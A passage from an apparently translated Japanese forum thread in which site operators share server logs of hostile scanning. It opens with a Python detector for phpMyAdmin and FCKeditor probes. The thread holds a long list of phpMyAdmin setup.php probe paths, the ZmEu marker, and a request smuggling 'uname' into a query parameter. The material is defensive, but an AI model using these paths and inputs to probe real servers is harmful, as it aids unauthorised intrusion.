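    r'(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Probe signatures seen in the thread: phpMyAdmin setup.php sweeps, guessed
# database-admin directories, the ZmEu "w00tw00t" marker, FCKeditor connectors.
PROBE_RE = re.compile(
    r'/scripts/setup\.php$'
    r'|/(?:php-?my-?admin|pma|myadmin|mysqladmin|dbadmin|phppgadmin)[^/]*(?:/|$)'
    r'|/w00tw00t\.'
    r'|/(?:fckeditor|fck)/editor/filemanager/',
    re.IGNORECASE,
)


def normalise(path):
    """Drop the query string and collapse the '//' prefix the scanners send."""
    return re.sub(r'/{2,}', '/', path.split('?', 1)[0])


def find_scanners(lines, min_paths=5, window=timedelta(seconds=60)):
    """Return {host: summary} for hosts probing >= min_paths distinct paths
    within `window`. Thresholds are assumptions; tune them to your traffic."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        path = normalise(m['path'])
        if not PROBE_RE.search(path):
            continue
        ts = datetime.strptime(m['ts'], TS_FMT)
        hits[m['host']].append((ts, path, int(m['status']), m['ua'] or '-'))

    report = {}
    for host, events in hits.items():
        events.sort(key=lambda e: e[0])
        best, start = 0, 0
        for end in range(len(events)):
            # Slide the window so it never spans more than `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({e[1] for e in events[start:end + 1]}))
        if best >= min_paths:
            report[host] = {
                'max_distinct_paths': best,
                'total_probes': len(events),
                # Anything other than 404 means the guessed path exists or is
                # handled specially, so check those first.
                'non_404': sorted({e[1] for e in events if e[2] != 404}),
                'user_agents': sorted({e[3] for e in events}),
            }
    return report


# Constructed sample input (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jul/2011:23:34:52 +0900] "GET //scripts/setup.php HTTP/1.1" 404 215 "-" "-"
192.0.2.10 - - [30/Jul/2011:23:34:52 +0900] "GET //admin/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
192.0.2.10 - - [30/Jul/2011:23:34:53 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
192.0.2.10 - - [30/Jul/2011:23:34:53 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "-"
192.0.2.10 - - [30/Jul/2011:23:34:54 +0900] "GET //phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
192.0.2.10 - - [30/Jul/2011:23:34:54 +0900] "GET //mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
203.0.113.5 - - [04/May/2011:17:00:57 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
203.0.113.5 - - [04/May/2011:17:00:57 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu"
203.0.113.5 - - [04/May/2011:17:00:58 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 310 "-" "ZmEu"
198.51.100.7 - - [04/May/2011:17:05:00 +0900] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [04/May/2011:17:05:09 +0900] "GET /pma/ HTTP/1.1" 404 280 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for host, info in sorted(find_scanners(SAMPLE_LOG, min_paths=3).items()):
        print(host, info)
```

A 403 on a probed path, as in some of the logs above, stands out in the `non_404` list because it tells the scanner the directory exists.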
63 :
DNS Unregistered-san: 2011/05/05 (Thu) 18:24:15.73 ID:GKw/2hw5
64 :
DNS Unregistered-san: 2011/05/05 (Thu) 21:15:53.74 ID:9a2Rswqc
65 :
DNS Unregistered-san: 2011/05/05 (Thu) 21:59:47.81 ID:GKw/2hw5
Mystery access from googlebot
What is this...
66.249.69.28 - - [05/May/2011:20:52:21 +0900] "GET /upload/viewer_board/wdviewer.exe HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.28 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/HwpViewer2007.exe HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.73 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/AdbeRdr70_kor_full.exe HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.28 - - [05/May/2011:20:52:25 +0900] "GET /upload/viewer_board/Hunv2k.exe HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Did Googlebot really use a UA like that?
Yes, it does.
113.33.224.197
I got an FTP attack; I have Remote Desktop open, so is this going to be OK?
208.51.40.50
It had been port scanning me the whole time
When I looked up this IP address I ended up at what looks like a Chinese newspaper (?) site; maybe it's been cracked?
85.25.131.109 - - [16/Jun/2011:03:21:39 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 404 385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0"
Lately I've been getting requests for Y-ivrrecording.php about every 3 days
I don't have any such file, though
This one is hitting me right now
66.241.100.228
The content is
the same as >>61
73 :
DNS Unregistered-san: 2011/06/18 (Sat) 10:11:08.72 ID:/Zs3Wyia
182.164.91.73
219.135.253.80(80.253.135.219.broad.gz.gd.dynamic.163data.com.cn)
From China
It was trying to log in to FTP as Administrator
114.173.176.253 p17253-ipngn100102okayamaima.okayama.ocn.ne.jp
114.174.207.4 p12004-ipngn100105osakakita.osaka.ocn.ne.jp
114.174.253.34 p14034-ipngn100108osakakita.osaka.ocn.ne.jp
114.173.15.191 p12191-ipngn100403kobeminato.hyogo.ocn.ne.jp
114.173.137.79 p18079-ipngn100204niho.hiroshima.ocn.ne.jp
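They attempt connections to TCP 445 20 to 30 times a day
It's getting annoying
I get about 50 to 120 attacks on FTP a day
I'm knocking them down with swatch, though
Is this going to be the title of the next thread?
The thread for exposing IPs that launched Attack No. 2
Attack Chance
I couldn't find a more suitable place to post this. Recently,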
125.175.54.138 - - [15/Jul/2011:03:32:55 +0900] "GET /you/new.htm HTTP/1.1" 200 55472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:02 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑
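... and so on, endlessly ...
log entries like these have started to catch my eye. The source IP is inside Japan.
The requested URL is a valid one, but there are no requests for the images embedded in it;
only this page is requested over and over. No referer either.
As a distinguishing feature, the requests always come in groups of three,
and then the next ones come 100 to 200 seconds later.
... What could this be?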
31.25.136.18 - - [21/Jun/2011:19:48:48 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 403 1506
193.227.186.153 - - [21/Jun/2011:14:05:16 +0900] "GET /admin/config.php HTTP/1.1" 403 1506
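I've been getting a lot of requests for these two PHP files lately.
Even though I don't have them.
I'm rejecting requests from JP or from hosts with no reverse DNS, but I wonder if I should return 404 instead
>>80 Judging from the URL, is that a page where you post update news or something?
If so, I think it's access for scraping purposes
I don't know what the page actually is, so this is a guess, but I don't think there's any malice
>>81 Those are bots, so returning 404 is pointless
83 :
80: 2011/07/17 (Sun) 20:59:14.77 ID:???
>>82 It's update news, and there's similar access to the links page too.
Surprisingly, it might be that a program that spreads referer spam is running, but
security software is stripping the referer, or something...
But referer spam behaves a bit differently.
I think the intervals are too regular for referer spam...
Try changing the HTML structure and see what happens
and whether the pace breaks or there are signs of someone accessing it by hand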
68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //scripts/setup.php HTTP/1.1" 404 215 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //admin/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 225 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //db/scripts/setup.php HTTP/1.1" 404 218 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 230 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //web/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.3.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.4.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.5.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.6.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.8.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.9.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.3/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-2.11.9.4/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.0.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.3.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //p/m/a/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //PMA2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2006/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2007/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2008/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2009/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
